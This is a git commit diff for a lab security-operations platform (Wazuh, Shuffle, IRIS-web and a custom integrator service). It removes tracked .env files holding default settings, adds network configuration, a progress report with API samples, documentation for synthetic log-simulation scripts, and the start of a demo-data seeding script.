soc update

.gitignore

@@ -27,10 +27,10 @@ node_modules/
 **/node_modules/
 
 # Env/secrets
-# .env
-# .env.*
-# !.env.example
-# !**/.env.example
+.env
+.env.*
+!.env.example
+!**/.env.example
 # *.pem
 # *.key
 # *.crt

Shuffle/.env

@@ -1,122 +0,0 @@
-# Default execution environment for workers
-ENVIRONMENT_NAME=Shuffle
-
-# Sanitize liquid.py input
-LIQUID_SANITIZE_INPUT=true
-
-
-# Remote github config for first load
-SHUFFLE_DOWNLOAD_WORKFLOW_LOCATION=
-SHUFFLE_DOWNLOAD_WORKFLOW_USERNAME=
-SHUFFLE_DOWNLOAD_WORKFLOW_PASSWORD=
-SHUFFLE_DOWNLOAD_WORKFLOW_BRANCH=
-
-SHUFFLE_APP_DOWNLOAD_LOCATION=https://github.com/shuffle/python-apps
-SHUFFLE_DOWNLOAD_AUTH_USERNAME=
-SHUFFLE_DOWNLOAD_AUTH_PASSWORD=
-SHUFFLE_DOWNLOAD_AUTH_BRANCH=
-SHUFFLE_APP_FORCE_UPDATE=false
-
-# User config for first load. Username & PW: min length 3
-SHUFFLE_DEFAULT_USERNAME=
-SHUFFLE_DEFAULT_PASSWORD=
-SHUFFLE_DEFAULT_APIKEY=
-
-# Local location of your app directory. Can't use ~/
-# Files will get better at some point. Right now: local saving.
-SHUFFLE_APP_HOTLOAD_FOLDER=./shuffle-apps
-SHUFFLE_APP_HOTLOAD_LOCATION=./shuffle-apps
-SHUFFLE_FILE_LOCATION=./shuffle-files
-
-# Encryption modifier. This HAS to be set to encrypt any authentication being used in Shuffle. This is put together with other relevant values to ensure multiple parts are needed to decrypt.
-# If this key is lost or changed, you will have to reauthenticate all apps.
-SHUFFLE_ENCRYPTION_MODIFIER=
-
-# Other configs
-BASE_URL=http://shuffle-backend:5001
-SSO_REDIRECT_URL=http://localhost:3001
-BACKEND_HOSTNAME=shuffle-backend
-BACKEND_PORT=5001
-FRONTEND_PORT=3001
-FRONTEND_PORT_HTTPS=3443
-AUTH_FOR_ORBORUS=
-
-# CHANGE THIS IF YOU WANT GOOD LOCAL EXECUTIONS:
-OUTER_HOSTNAME=shuffle-backend
-DB_LOCATION=./shuffle-database
-DOCKER_API_VERSION=1.44
-
-# Orborus/Proxy configurations
-HTTP_PROXY=
-HTTPS_PROXY=
-SHUFFLE_PASS_WORKER_PROXY=TRUE
-SHUFFLE_PASS_APP_PROXY=TRUE
-SHUFFLE_INTERNAL_HTTP_PROXY=noproxy
-SHUFFLE_INTERNAL_HTTPS_PROXY=noproxy
-# Timezone-handler in Orborus, Worker and Apps
-TZ=Europe/Amsterdam
-# Used to FIND the containername. cgroup v2: issue 501
-ORBORUS_CONTAINER_NAME=
-# Used for setting up a startup delay for Orborus
-SHUFFLE_ORBORUS_STARTUP_DELAY=
-SHUFFLE_SKIPSSL_VERIFY=true
-# Used for controlling if the environment should run in kubernetes or not
-IS_KUBERNETES=false
-
-#SHUFFLE_BASE_IMAGE_NAME=shuffle
-#SHUFFLE_BASE_IMAGE_REGISTRY=ghcr.io
-SHUFFLE_BASE_IMAGE_REPOSITORY=frikky
-#SHUFFLE_BASE_IMAGE_TAG_SUFFIX="-1.4.0"
-
-# For environments using their own docker registry
-# where they don't want to update http, subflow and shuffle tools again
-SHUFFLE_USE_GCHR_OVERRIDE_FOR_AUTODEPLOY=true
-
-# The eth0 interface inside a container corresponds
-# to the virtual Ethernet interface that connects
-# the container to the docker0
-SHUFFLE_SWARM_BRIDGE_DEFAULT_INTERFACE=eth0
-# 1500 by default
-SHUFFLE_SWARM_BRIDGE_DEFAULT_MTU=1500
-
-# Used for auto-cleanup of containers. REALLY important at scale. Set to false to see all container info.
-SHUFFLE_MEMCACHED=
-SHUFFLE_CONTAINER_AUTO_CLEANUP=true
-# The amount of concurrent executions Orborus can handle. This is a soft limit, but it's recommended to keep it low.
-SHUFFLE_ORBORUS_EXECUTION_CONCURRENCY=5
-SHUFFLE_HEALTHCHECK_DISABLED=false
-SHUFFLE_ELASTIC=true
-SHUFFLE_LOGS_DISABLED=true
-SHUFFLE_CHAT_DISABLED=false
-SHUFFLE_DISABLE_RERUN_AND_ABORT=false
-SHUFFLE_RERUN_SCHEDULE=300
-# Definition in case Worker & Orborus is talking to the wrong server
-SHUFFLE_WORKER_SERVER_URL=
-# Definition in case Orborus is pulling too often/not often enough
-SHUFFLE_ORBORUS_PULL_TIME=
-# Max recursion depth for subflows
-SHUFFLE_MAX_EXECUTION_DEPTH=
-# Amount of app replicas
-SHUFFLE_APP_REPLICAS=3
-
-# DATABASE CONFIGURATIONS
-DATASTORE_EMULATOR_HOST=shuffle-database:8000
-SHUFFLE_OPENSEARCH_URL=https://shuffle-opensearch:9200
-SHUFFLE_OPENSEARCH_CERTIFICATE_FILE=
-SHUFFLE_OPENSEARCH_APIKEY=
-SHUFFLE_OPENSEARCH_CLOUDID=
-SHUFFLE_OPENSEARCH_PROXY=
-SHUFFLE_OPENSEARCH_INDEX_PREFIX=
-SHUFFLE_OPENSEARCH_SKIPSSL_VERIFY=true
-SHUFFLE_OPENSEARCH_USERNAME="admin"
-SHUFFLE_OPENSEARCH_PASSWORD="StrongShufflePassword321!" # In use for the first time setup of OpenSearch + backend of Shuffle
-OPENSEARCH_INITIAL_ADMIN_PASSWORD="StrongShufflePassword321!" # In use for the first time setup of OpenSearch
-SHUFFLE_SKIP_PIPELINES=true
-SHUFFLE_PIPELINE_ENABLED=false
-
-#Tenzir related
-SHUFFLE_TENZIR_URL=
-
-SHUFFLE_PROTECTED_CLEANUP_DISABLED=true
-
-DEBUG_MODE=false

compose-overrides/soc-integrator.yml

@@ -41,6 +41,8 @@ services:
         condition: service_healthy
     networks:
       - soc_shared
+      - shuffle_default
+      - shuffle_swarm_executions
 
 volumes:
   soc-integrator-db-data:
@@ -49,3 +51,9 @@ networks:
   soc_shared:
     external: true
     name: ${SOC_SHARED_NETWORK:-soc_shared}
+  shuffle_default:
+    external: true
+    name: shuffle_shuffle
+  shuffle_swarm_executions:
+    external: true
+    name: shuffle_swarm_executions

iris-web/.env

@@ -1,103 +0,0 @@
-# -- COMMON
-LOG_LEVEL=info
-
-# -- NGINX
-NGINX_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_nginx
-NGINX_IMAGE_TAG=latest
-
-SERVER_NAME=iris.app.dev
-KEY_FILENAME=iris_dev_key.pem
-CERT_FILENAME=iris_dev_cert.pem
-
-# -- DATABASE
-DB_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_db
-DB_IMAGE_TAG=latest
-
-POSTGRES_USER=postgres
-POSTGRES_PASSWORD=__MUST_BE_CHANGED__
-POSTGRES_ADMIN_USER=raptor
-POSTGRES_ADMIN_PASSWORD=__MUST_BE_CHANGED__
-POSTGRES_DB=iris_db
-
-POSTGRES_SERVER=db
-POSTGRES_PORT=5432
-
-# -- IRIS
-APP_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_app
-APP_IMAGE_TAG=latest
-
-DOCKERIZED=1
-
-IRIS_SECRET_KEY=AVerySuperSecretKey-SoNotThisOne
-IRIS_SECURITY_PASSWORD_SALT=ARandomSalt-NotThisOneEither
-IRIS_UPSTREAM_SERVER=app
-IRIS_UPSTREAM_PORT=8000
-
-IRIS_FRONTEND_SERVER=frontend
-IRIS_FRONTEND_PORT=5173
-
-IRIS_SVELTEKIT_FRONTEND_DIR=../iris-frontend
-
-
-# -- WORKER
-CELERY_BROKER=amqp://rabbitmq
-
-# -- AUTH
-IRIS_AUTHENTICATION_TYPE=local
-## optional
-IRIS_ADM_PASSWORD=MySuperAdminPassword!
-#IRIS_ADM_API_KEY=B8BA5D730210B50F41C06941582D7965D57319D5685440587F98DFDC45A01594
-#IRIS_ADM_EMAIL=admin@localhost
-IRIS_ADM_USERNAME=administrator
-# requests the just-in-time creation of users with ldap authentification (see https://github.com/dfir-iris/iris-web/issues/203)
-#IRIS_AUTHENTICATION_CREATE_USER_IF_NOT_EXIST=True
-# the group to which newly created users are initially added, default value is Analysts
-#IRIS_NEW_USERS_DEFAULT_GROUP=
-
-# -- FOR LDAP AUTHENTICATION
-#IRIS_AUTHENTICATION_TYPE=ldap
-#LDAP_SERVER=127.0.0.1
-#LDAP_AUTHENTICATION_TYPE=SIMPLE
-#LDAP_PORT=3890
-#LDAP_USER_PREFIX=uid=
-#LDAP_USER_SUFFIX=ou=people,dc=example,dc=com
-#LDAP_USE_SSL=False
-# base DN in which to search for users
-#LDAP_SEARCH_DN=ou=users,dc=example,dc=org
-# unique identifier to search the user
-#LDAP_ATTRIBUTE_IDENTIFIER=cn
-# name of the attribute to retrieve the user's display name
-#LDAP_ATTRIBUTE_DISPLAY_NAME=displayName
-# name of the attribute to retrieve the user's email address
-#LDAP_ATTRIBUTE_MAIL=mail
-#LDAP_VALIDATE_CERTIFICATE=True
-#LDAP_TLS_VERSION=1.2
-#LDAP_SERVER_CERTIFICATE=
-#LDAP_PRIVATE_KEY=
-#LDAP_PRIVATE_KEY_PASSWORD=
-
-# -- FOR OIDC AUTHENTICATION
-# IRIS_AUTHENTICATION_TYPE=oidc
-# OIDC_ISSUER_URL=
-# OIDC_CLIENT_ID=
-# OIDC_CLIENT_SECRET=
-# endpoints only required if provider doesn't support metadata discovery
-# OIDC_AUTH_ENDPOINT=
-# OIDC_TOKEN_ENDPOINT=
-# optional to include logout from oidc provider
-# OIDC_END_SESSION_ENDPOINT=
-# OIDC redirect URL for your IDP: https://<IRIS_SERVER_NAME>/oidc-authorize
-
-# -- LISTENING PORT
-INTERFACE_HTTPS_PORT=443
-
-# -- FOR OIDC AUTHENTICATION
-#IRIS_AUTHENTICATION_TYPE=oidc
-#OIDC_ISSUER_URL=
-#OIDC_CLIENT_ID=
-#OIDC_CLIENT_SECRET=
-# endpoints only required if provider doesn't support metadata discovery
-#OIDC_AUTH_ENDPOINT=
-#OIDC_TOKEN_ENDPOINT=
-# optional to include logout from oidc provider
-#OIDC_END_SESSION_ENDPOINT=

progress-update.md

@@ -177,3 +177,301 @@ Target outputs:
 - Tuned policy thresholds for customer environment
 - Signed-off incident lifecycle flow:
   Wazuh event -> soc-integrator decision -> IRIS case -> PagerDuty Stub escalation
+
+---
+
+Date: February 26, 2026
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
+
+## Incremental Progress Since February 13, 2026
+
+### 1) IOC Enrichment and Evaluation
+
+- Added IOC APIs in `soc-integrator`:
+  - `POST /ioc/enrich`
+  - `POST /ioc/evaluate`
+  - `GET /ioc/history`
+  - `POST /ioc/upload-file`
+  - `POST /ioc/evaluate-file`
+  - `GET /ioc/analysis/{analysis_id}`
+- Integrated VirusTotal adapter for domain/hash/file intelligence and analysis lookups.
+- Integrated AbuseIPDB adapter for IP reputation checks.
+- Added IOC trace persistence (`ioc_trace`) and repository methods for audit/history.
+
+### 2) IRIS Integration Enhancements
+
+- Added IRIS ticket APIs in `soc-integrator`:
+  - `POST /iris/tickets`
+  - `GET /iris/tickets`
+- Updated IRIS API key in environment and verified ticket creation path via API.
+- Added demo data seeding script:
+  - `scripts/seed-iris-demo-data.sh`
+
+### 3) Shuffle Workflow Automation
+
+- Created and updated sample Shuffle workflow assets for webhook-driven IRIS ticket creation:
+  - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
+  - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.md`
+- Added workflow update helper script:
+  - `scripts/update-shuffle-workflow-from-template.sh`
+- Updated target workflow (`07ecad05-ff68-41cb-888d-96d1a8e8db4b`) with:
+  - webhook trigger
+  - HTTP action (`http 1.4.0`) to call `soc-integrator` ticket API
+  - tested webhook execution path to successful completion
+
+### 4) Networking and Runtime Fixes
+
+- Resolved Shuffle action DNS failure to `soc-integrator` by attaching `soc-integrator` service to Shuffle execution network(s) in:
+  - `compose-overrides/soc-integrator.yml`
+- Verified connectivity from Shuffle execution context to:
+  - `http://soc-integrator:8080/health`
+
+### 5) Security and Repository Hygiene
+
+- Added `.env` and `.env.*` to root `.gitignore` (kept `.env.example` tracked).
+- Removed tracked env files from git cache to prevent secret leakage.
+- Updated operational API keys in `soc-integrator/.env` for Shuffle, IRIS, VirusTotal, and AbuseIPDB.
+
+### 6) Current Status (Lab)
+
+- `soc-integrator` health endpoint: reachable.
+- IOC enrich/evaluate flows: operational for domain/hash and file submission paths.
+- Shuffle webhook-to-IRIS automation: operational after network fix.
+- Core stack components remain available for continued UAT and tuning.
+
+### 7) Simulation Logs Workstream
+
+#### Completed
+
+- Added FortiGate simulation coverage for multiple models:
+  - 40F
+  - 60F
+  - 80F
+  - 501E
+- Added endpoint agent simulation coverage for:
+  - Windows clients
+  - macOS clients
+  - Linux clients
+- Added continuous run mode (`--forever`) to simulation scripts for long-running lab traffic generation.
+- Extended script set to support realistic event streams for Wazuh ingestion and rule validation.
+
+#### Operational scripts
+
+- `scripts/send-wazuh-test-events.sh`
+- `scripts/send-wazuh-endpoint-agent-test-events.sh`
+- additional simulation scripts under `scripts/` for firewall and endpoint scenarios with continuous mode enabled
+
+#### Detection alignment status
+
+- Simulation work has been aligned to the detection objectives documented in:
+  - `Security Detection & Threat Intelligence Enhancement Proposal-2.md`
+- Proposal use-case mapping explicitly covered in simulation:
+  - **A1. DNS / Firewall (IOC)**:
+    - DNS network communication to malicious domain
+    - DNS/Firewall malicious domain IOC detection events
+  - **A2. FortiGate IPS/IDS & Firewall**:
+    - allowed RDP from public IP
+    - admin password change
+    - create/add admin account
+    - disable email notification
+    - config download
+    - multiple critical/high IDS alerts
+    - port scanning (public/private source variants)
+    - IOC detection and communication to malicious IP
+  - **A3. FortiGate VPN**:
+    - authentication success from guest account
+    - authentication success from multiple countries
+    - brute-force success pattern
+    - multiple fail patterns (many accounts from one source)
+    - authentication success from outside Thailand
+  - **A4. Windows / Active Directory**:
+    - privileged/service account authentication failures
+    - password spray and multi-source fail patterns
+    - success from public IP / guest account
+    - pass-the-hash style success indicators
+    - account/group privilege change and account lifecycle events (create/re-enable)
+    - AD enumeration behavior indicators
+- Endpoint client simulations were added to complement proposal scope for heterogeneous environments:
+  - Windows agent events
+  - macOS agent events
+  - Linux agent events
+- Current use is suitable for pipeline and workflow validation (ingest -> detect -> automate -> case creation).
+- Remaining work is focused on fine-grained scenario calibration:
+  - event frequency tuning
+  - field/value realism per source
+  - expected alert volume by use case for cleaner UAT evidence
+
+### 8) API Request/Response Samples
+
+#### IOC Enrich
+
+Request:
+
+```bash
+curl -sS -X POST http://localhost:8088/ioc/enrich \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "ioc_type": "domain",
+    "ioc_value": "google.com",
+    "sources": ["virustotal"]
+  }'
+```
+
+Sample response:
+
+```json
+{
+  "success": true,
+  "ioc_type": "domain",
+  "ioc_value": "google.com",
+  "enrichment": {
+    "virustotal": {
+      "reputation": 120,
+      "last_analysis_stats": {
+        "malicious": 0,
+        "suspicious": 0,
+        "harmless": 90
+      }
+    }
+  }
+}
+```
+
+#### IOC Evaluate
+
+Request:
+
+```bash
+curl -sS -X POST http://localhost:8088/ioc/evaluate \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "ioc_type": "hash",
+    "ioc_value": "44d88612fea8a8f36de82e1278abb02f",
+    "sources": ["virustotal"]
+  }'
+```
+
+Sample response:
+
+```json
+{
+  "success": true,
+  "matched": true,
+  "severity": "high",
+  "reason": "VirusTotal marked IOC as malicious",
+  "ioc_type": "hash",
+  "ioc_value": "44d88612fea8a8f36de82e1278abb02f"
+}
+```
+
+#### Create IRIS Ticket (via soc-integrator)
+
+Request:
+
+```bash
+curl -sS -X POST http://localhost:8088/iris/tickets \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "title": "Suspicious domain detected",
+    "description": "Automated ticket from IOC evaluation pipeline",
+    "severity": "medium",
+    "source_ref": "shuffle-webhook-demo"
+  }'
+```
+
+Sample response:
+
+```json
+{
+  "success": true,
+  "ticket_id": 53,
+  "case_id": 53,
+  "status": "open"
+}
+```
+
+### 9) Why IOC Was Added to SOC Integrator
+
+- To centralize threat-intelligence logic in one API layer instead of duplicating enrichment/evaluation rules across Shuffle workflows and other services.
+- To provide a consistent decision contract (`enrich` for context, `evaluate` for action/verdict) that downstream automation can trust.
+- To improve traceability by storing IOC checks and decisions in `soc-integrator` history for audit, tuning, and UAT evidence.
+- To simplify integrations with multiple intelligence providers (VirusTotal, AbuseIPDB, and future sources) behind one internal interface.
+- To reduce workflow complexity in Shuffle so playbooks focus on orchestration (branching, ticketing, notifications) while IOC decisioning stays in backend logic.
+
+### 10) Sequence Diagram (MermaidJS)
+
+```mermaid
+sequenceDiagram
+    autonumber
+    participant Sim as Log Simulator
+    participant Wz as Wazuh
+    participant Sh as Shuffle
+    participant SI as soc-integrator
+    participant VT as VirusTotal/AbuseIPDB
+    participant IR as IRIS
+
+    Sim->>Wz: Send FortiGate/Endpoint simulated logs
+    Wz->>Wz: Parse + correlate + trigger alert rule
+    Wz->>Sh: Trigger workflow (webhook/API)
+    Sh->>SI: POST /ioc/enrich (ioc_type, ioc_value)
+    SI->>VT: Query IOC intelligence
+    VT-->>SI: Enrichment data
+    SI-->>Sh: Enrichment result
+    Sh->>SI: POST /ioc/evaluate (ioc + enrichment context)
+    SI->>SI: Apply decision logic + write ioc_trace
+    SI-->>Sh: matched/severity/reason
+    alt matched == true
+        Sh->>SI: POST /iris/tickets
+        SI->>IR: Create ticket/case
+        IR-->>SI: ticket_id/case_id
+        SI-->>Sh: Ticket creation success
+    else matched == false
+        Sh-->>Sh: End workflow without ticket
+    end
+```
+
+### 11) SOC Integrator API Inventory
+
+| Group | Method | Endpoint | Notes |
+|---|---|---|---|
+| Core | GET | `/health` | Service health and target configuration |
+| Core | POST | `/ingest/wazuh-alert` | Normalize inbound Wazuh alert payload |
+| Core | POST | `/action/create-incident` | Create PagerDuty incident |
+| Core | POST | `/action/trigger-shuffle` | Trigger Shuffle workflow execution |
+| Core | POST | `/action/create-iris-case` | Create IRIS case (legacy action endpoint) |
+| IRIS | POST | `/iris/tickets` | Create IRIS ticket/case via soc-integrator |
+| IRIS | GET | `/iris/tickets` | List/query IRIS tickets/cases |
+| IOC | POST | `/ioc/enrich` | IOC enrichment from configured intel sources |
+| IOC | POST | `/ioc/evaluate` | IOC decisioning/verdict |
+| IOC | POST | `/ioc/upload-file` | Upload file to IOC backend (VirusTotal flow) |
+| IOC | GET | `/ioc/analysis/{analysis_id}` | Retrieve IOC analysis status/result |
+| IOC | POST | `/ioc/evaluate-file` | Evaluate file indicator or uploaded sample |
+| IOC | GET | `/ioc/history` | Retrieve stored IOC trace history |
+| Shuffle | GET | `/shuffle/health` | Shuffle service reachability check |
+| Shuffle | GET | `/shuffle/auth-test` | Validate Shuffle API key access |
+| Shuffle | POST | `/shuffle/login` | Login against Shuffle API |
+| Shuffle | POST | `/shuffle/generate-apikey` | Generate Shuffle API key from credentials |
+| Shuffle | GET | `/shuffle/workflows` | List workflows |
+| Shuffle | GET | `/shuffle/workflows/{workflow_id}` | Get workflow detail |
+| Shuffle | POST | `/shuffle/workflows/{workflow_id}/execute` | Execute specific workflow |
+| Shuffle | GET | `/shuffle/apps` | List installed/available Shuffle apps |
+| Shuffle | POST | `/shuffle/proxy` | Generic proxy request to Shuffle API |
+| Wazuh | GET | `/sync/wazuh-version` | Fetch Wazuh version information |
+| Wazuh | GET | `/wazuh/auth-test` | Validate Wazuh API authentication |
+| Wazuh | GET | `/wazuh/manager-info` | Manager information |
+| Wazuh | GET | `/wazuh/agents` | List Wazuh agents |
+| Wazuh | GET | `/wazuh/alerts` | Query recent Wazuh alerts |
+| Wazuh | GET | `/wazuh/manager-logs` | Read manager logs |
+| Wazuh | POST | `/wazuh/sync-to-mvp` | Sync Wazuh alerts into MVP pipeline |
+| Wazuh | GET | `/wazuh/auto-sync/status` | Auto-sync loop status |
+| MVP | POST | `/mvp/incidents/ingest` | Ingest incident into MVP flow |
+| MVP | POST | `/mvp/ioc/evaluate` | Evaluate IOC under MVP policy |
+| MVP | POST | `/mvp/vpn/evaluate` | Evaluate VPN event under MVP policy |
+| MVP | GET | `/mvp/config/policies` | Read MVP policy configuration |
+| MVP | PUT | `/mvp/config/policies` | Update MVP policy configuration |
+| MVP | GET | `/mvp/health/dependencies` | Dependency health snapshot |
+
+Additional FastAPI-generated endpoints:
+
+- `GET /docs`
+- `GET /openapi.json`

scripts/README.md

@@ -8,6 +8,9 @@ Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
 scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds]
 ```
 
+Optional flag:
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
+
 Scenarios:
 - `ioc_dns`
 - `ioc_ips`
@@ -21,6 +24,7 @@ Examples:
 scripts/send-wazuh-test-events.sh all
 scripts/send-wazuh-test-events.sh vpn_outside_th 5 0.2
 WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-test-events.sh ioc_ips
+scripts/send-wazuh-test-events.sh all 1 2 --forever
 ```
 
 Environment overrides:
@@ -42,6 +46,9 @@ Use this to inject Cisco-style syslog events (ASA/IOS) into Wazuh manager.
 scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds]
 ```
 
+Optional flag:
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
+
 Scenarios:
 - `asa_acl_deny`
 - `asa_vpn_auth_fail`
@@ -55,6 +62,7 @@ Examples:
 scripts/send-wazuh-cisco-test-events.sh all
 scripts/send-wazuh-cisco-test-events.sh asa_acl_deny 5 0.2
 CISCO_DEVICE_HOST=edge-fw-01 scripts/send-wazuh-cisco-test-events.sh ios_login_fail
+scripts/send-wazuh-cisco-test-events.sh all 1 2 --forever
 ```
 
 Environment overrides:
@@ -66,6 +74,154 @@ Environment overrides:
 - `CISCO_VPN_USER`
 - `CISCO_ADMIN_USER`
 
+## Send FortiGate firewall test events
+
+Use this to inject FortiGate-style syslog events (models `501E`, `80F`, `60F`, `40F`) into Wazuh manager.
+
+```bash
+scripts/send-wazuh-fortigate-test-events.sh [model] [count] [delay_seconds]
+```
+
+Optional flag:
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
+
+Models:
+- `501E`
+- `80F`
+- `60F`
+- `40F`
+- `all`
+
+Examples:
+
+```bash
+scripts/send-wazuh-fortigate-test-events.sh all
+scripts/send-wazuh-fortigate-test-events.sh 80F 5 0.2
+WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-fortigate-test-events.sh 60F
+scripts/send-wazuh-fortigate-test-events.sh all 1 2 --forever
+```
+
+Environment overrides:
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
+- `WAZUH_SYSLOG_PORT` (default `514`)
+- `FGT_SRC_IP`
+- `FGT_DST_IP`
+- `FGT_DOMAIN`
+- `FGT_USER`
+
+## Run continuous FortiGate simulation
+
+Use this to generate ongoing FortiGate-like traffic and security events for Wazuh testing.
+
+```bash
+scripts/send-wazuh-fortigate-continuous.sh [profile] [models] [base_delay_seconds]
+```
+
+Profiles:
+- `normal` (mostly allowed traffic, occasional admin/vpn/webfilter)
+- `incident` (higher IPS/webfilter/vpn anomalies)
+- `mixed` (balanced baseline + anomalies)
+
+Models:
+- `501E`
+- `80F`
+- `60F`
+- `40F`
+- `all`
+
+Examples:
+
+```bash
+scripts/send-wazuh-fortigate-continuous.sh mixed all 0.8
+scripts/send-wazuh-fortigate-continuous.sh incident 80F 0.3
+SIM_MAX_EVENTS=200 scripts/send-wazuh-fortigate-continuous.sh normal 501E 1.0
+```
+
+Environment overrides:
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
+- `WAZUH_SYSLOG_PORT` (default `514`)
+- `SIM_MAX_EVENTS` (default `0`, which means run forever)
+- `SIM_SRC_PREFIX` (default `10.10.20`)
+- `SIM_VPN_USER`
+- `SIM_ADMIN_USER`
+
+## Simulate all required logs from proposal
+
+Use this to generate synthetic logs for all use cases listed in:
+`Security Detection & Threat Intelligence Enhancement Proposal-2.md` Appendix A (A1-A4).
+
+```bash
+scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
+```
+
+Optional flag:
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
+
+Selectors:
+- `all` (all Appendix A use cases)
+- `a1`, `a2`, `a3`, `a4` (by section)
+- specific use case id, e.g. `A2-01`, `A3-05`, `A4-24`
+
+Examples:
+
+```bash
+scripts/send-wazuh-proposal-required-events.sh all 1
+scripts/send-wazuh-proposal-required-events.sh a3 3 0.5
+scripts/send-wazuh-proposal-required-events.sh A3-05 1
+DRY_RUN=1 scripts/send-wazuh-proposal-required-events.sh all 1
+scripts/send-wazuh-proposal-required-events.sh a2 1 2 --forever
+```
+
+Environment overrides:
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
+- `WAZUH_SYSLOG_PORT` (default `514`)
+- `EVENT_DELAY` (default `0.05`)
+- `DRY_RUN` (default `0`, set `1` to print only)
+- `FGT_DEVNAME`, `FGT_DEVID`
+- `WIN_HOST`, `DNS_HOST`
+- `SIM_VPN_USER`
+
+## Simulate endpoint client-agent logs (Windows / macOS / Linux)
+
+Use this to inject realistic endpoint telemetry for client agents into Wazuh.
+
+```bash
+scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds]
+```
+
+Optional flag:
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
+
+Platforms:
+- `windows`
+- `mac`
+- `linux`
+- `all`
+
+Scenarios:
+- `auth`
+- `process`
+- `persistence`
+- `privilege`
+- `malware`
+- `all`
+
+Examples:
+
+```bash
+scripts/send-wazuh-endpoint-agent-test-events.sh all all 1 0.2
+scripts/send-wazuh-endpoint-agent-test-events.sh windows process 10 0.1
+DRY_RUN=1 scripts/send-wazuh-endpoint-agent-test-events.sh linux all 1 0
+scripts/send-wazuh-endpoint-agent-test-events.sh all auth 1 2 --forever
+```
+
+Environment overrides:
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
+- `WAZUH_SYSLOG_PORT` (default `514`)
+- `DRY_RUN` (default `0`)
+- `WIN_HOST`, `MAC_HOST`, `LINUX_HOST`
+- `SIM_USER`
+
 ## Shuffle sample workflow helpers
 
 Sample playbook design for Shuffle:

scripts/seed-iris-demo-data.sh

@@ -0,0 +1,138 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+read_env_var() {
+  local key="$1"
+  local file="$2"
+  [[ -f "${file}" ]] || return 1
+  sed -n "s/^${key}=//p" "${file}" | head -n1
+}
+
+SOC_ENV_FILE="${SOC_ENV_FILE:-soc-integrator/.env}"
+ROOT_ENV_FILE="${ROOT_ENV_FILE:-.env}"
+
+iris_api_key_from_env="${IRIS_API_KEY:-}"
+if [[ -z "${iris_api_key_from_env}" ]]; then
+  iris_api_key_from_env="$(read_env_var "IRIS_API_KEY" "${SOC_ENV_FILE}" || true)"
+fi
+if [[ -z "${iris_api_key_from_env}" ]]; then
+  iris_api_key_from_env="$(read_env_var "IRIS_API_KEY" "${ROOT_ENV_FILE}" || true)"
+fi
+
+integrator_url_from_env="${INTEGRATOR_URL:-}"
+if [[ -z "${integrator_url_from_env}" ]]; then
+  integrator_url_from_env="$(read_env_var "INTEGRATOR_URL" "${SOC_ENV_FILE}" || true)"
+fi
+if [[ -z "${integrator_url_from_env}" ]]; then
+  integrator_url_from_env="http://localhost:8088"
+fi
+
+iris_base_url_from_env="${IRIS_BASE_URL:-}"
+if [[ -z "${iris_base_url_from_env}" ]]; then
+  iris_base_url_from_env="$(read_env_var "IRIS_BASE_URL" "${SOC_ENV_FILE}" || true)"
+fi
+if [[ -z "${iris_base_url_from_env}" ]]; then
+  iris_base_url_from_env="https://localhost:8443"
+fi
+
+MODE="${MODE:-integrator}"                  # integrator | direct
+COUNT="${COUNT:-5}"
+PREFIX="${PREFIX:-SOC Demo Incident}"
+INTEGRATOR_URL="${integrator_url_from_env}"
+IRIS_BASE_URL="${iris_base_url_from_env}"
+IRIS_API_KEY="${iris_api_key_from_env}"
+IRIS_VERIFY_SSL="${IRIS_VERIFY_SSL:-false}" # false -> use -k
+CASE_CUSTOMER="${CASE_CUSTOMER:-1}"
+CASE_SOC_ID="${CASE_SOC_ID:-}"
+
+if [[ ! "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
+  echo "error: COUNT must be a positive integer"
+  exit 1
+fi
+
+timestamp="$(date +%Y%m%d-%H%M%S)"
+
+for i in $(seq 1 "${COUNT}"); do
+  severity="medium"
+  if (( i % 4 == 0 )); then
+    severity="critical"
+  elif (( i % 3 == 0 )); then
+    severity="high"
+  elif (( i % 2 == 0 )); then
+    severity="low"
+  fi
+
+  title="${PREFIX} #${i} (${timestamp})"
+  description="Generated demo IRIS case ${i}/${COUNT} at ${timestamp}"
+
+  if [[ "${MODE}" == "integrator" ]]; then
+    response="$(
+      curl -sS -X POST "${INTEGRATOR_URL}/iris/tickets" \
+        -H "Content-Type: application/json" \
+        -d "{
+          \"title\": \"${title}\",
+          \"description\": \"${description}\",
+          \"case_customer\": ${CASE_CUSTOMER},
+          \"case_soc_id\": \"${CASE_SOC_ID}\",
+          \"payload\": {}
+        }"
+    )"
+  elif [[ "${MODE}" == "direct" ]]; then
+    curl_args=(-sS -X POST "${IRIS_BASE_URL}/api/v2/cases" -H "Content-Type: application/json")
+    if [[ "${IRIS_VERIFY_SSL}" == "false" ]]; then
+      curl_args+=(-k)
+    fi
+    if [[ -n "${IRIS_API_KEY}" ]]; then
+      curl_args+=(-H "Authorization: Bearer ${IRIS_API_KEY}")
+    fi
+    response="$(
+      curl "${curl_args[@]}" \
